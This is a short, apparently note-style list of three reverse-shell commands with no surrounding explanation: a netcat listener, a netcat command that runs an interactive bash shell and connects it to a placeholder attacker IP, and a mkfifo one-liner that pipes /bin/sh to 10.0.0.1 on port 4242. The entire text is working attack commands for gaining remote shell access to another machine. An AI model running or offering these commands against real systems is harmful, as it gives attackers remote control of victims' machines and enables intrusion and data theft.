nc -lvnp [port number]
nc -e "/bin/bash -i" [Attack Machine IP] [Port]
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f